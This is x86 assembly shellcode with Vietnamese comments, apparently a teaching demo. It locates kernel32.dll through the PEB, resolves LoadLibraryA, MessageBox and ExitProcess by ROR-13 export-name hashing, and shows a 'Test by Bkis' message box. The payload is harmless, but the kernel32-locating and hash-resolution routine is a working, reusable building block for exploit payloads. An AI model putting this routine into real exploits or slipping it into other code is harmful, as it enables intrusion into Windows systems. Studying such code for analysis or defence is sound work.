; Code Lay dia chi Kernel32.dll find_kernel32: xor eax, eax mov eax, fs:[eax+0x30] ; eax -> cau truc PEB test eax, eax ; Win 9x ??? js find_kernel32_9x ; dung thi nhay toi Win9x find_kernel32_nt: ; sai thi day la Windows nt/2000/xp mov eax, [eax + 0x0c] ; eax -> cau truc ve cac Module da duoc LOAD mov esi, [eax + 0x1c] ; eax -> Entry dau tien cua cau truc nay lodsd ; eax -> Entry tiep theo la dia chi thong tin cua Kernel32.DLL mov eax, [eax + 0x8] ; eax -> Dia chi co so cua Kernel32.DLL jmp find_kernel32_finished ; Xong phan tim dia chi cua Kernel32.DLL find_kernel32_9x: mov eax, [eax + 0x34] lea eax, [eax + 0x7c] mov eax, [eax + 0x3c] find_kernel32_finished: ; EAX : DIA CHI CUA MODULE KERNEL32.DLL ; Lay dia chi cua mot ham LoadLibrary() mov edi,0xec0e4e8e ; bam cua LoadLibraryA push edi call Get_Address_From_EDT ; goi ham lay dia chi ham vao ebx pop edi mov edx, ebx ; luu dia chi ham LoadLibraryA vao edx ; EDX LUU DIA CHI CUA HAM LOADLIBRARY ; Lay dia chi cua thu vien USER32.DLL su dung ham LoadLibrary push eax ; luu dia chi Kernel32.dll jmp strUser32 find_mudule_dll: call edx ; Thuc hien ham LoadLibrary de lay dia chi cua Module ; EAX chua dia chi cua Modul USER32.DLL ; Lay dia chi ham MessageBox trong USER32.DLL mov edi,0xbc4da2a8 ; bam cua MessageBox push edi call Get_Address_From_EDT ; goi ham tra ve dia chi ham vao ebx pop edi ; EBX luu dia chi ham MESSAGEBOX ; Thuc thi ham MessageBox xor eax,eax push eax ; MB_OK jmp strContenu lauch_msgbox : pop eax push eax ; title push eax ; message xor eax,eax push eax ; NULL call ebx pop eax ; phuc hoi dia chi Kernel32.dll jmp finish_shelcode ; Ham lay dia chi thong qua PE & EDT & HASH Get_Address_From_EDT: ; input eax : dia chi thu vien push eax ; luu dia chi thu vien find_function: mov edi, eax ; edi -> Kernel32.dll mov eax, [edi + 0x3c] ; eax -> PE Header mov edx, [edi + eax + 0x78] add edx, edi ; edx -> Export Directory Table mov ecx, [edx + 0x18] ; ecx -> So luog ham xuat -> dung lam bien dem mov ebx, [edx + 0x20] add ebx, edi ; ebx -> Export Name Pointe Table find_function_loop: dec ecx ; giam bo dem ecx mov esi, DWORD ptr [ebx + ecx * 4] add esi, edi ; esi -> chuoi chua ten mot ham push edi compute_hash: xor edi, edi xor eax, eax cld compute_hash_again: lodsb test al, al jz compute_hash_finished ror edi, 0xd add edi, eax jmp compute_hash_again compute_hash_finished: find_function_compare: cmp edi, [esp+12] ; so khop voi bam cua ham can tim pop edi jnz find_function_loop mov ebx, [edx + 0x24] add ebx, edi ; ebx -> dia chi cua Ordinal Table mov cx, [ebx + 2 * ecx] ; ecx la chi so cua ham can tim trong Address Table mov ebx, [edx + 0x1c] add ebx, edi ; ebx -> dia chi cuar Address Table mov ebx, [ebx + 4 * ecx] add ebx, edi ; eax -> chinh la dia chi Ham GetProcAddress find_function_finished: pop eax ; phuc hoi dia chi Kernel32.dll vao eax ret ; EBX LA DI CHI HAM CAM TIM finish_shelcode: ;popad jmp _end ; Doan du lieu strUser32: call find_mudule_dll db ‘User32.dll’,0 strContenu: call lauch_msgbox db ‘Test by Bkis’,0 ; Doan ket thuc chuong trinhg _end: ; eax : KERNEL32.DLL, ebx : GETPROCADDRESS ; Thuc hien ham ExitProcess mov edi,0x73e2d87e ; bam cua ExitProcess push edi call Get_Address_From_EDT pop edi finish_program: push 1 call ebx ; thuc hien ham ExitProcess de ket thuc chuong trinh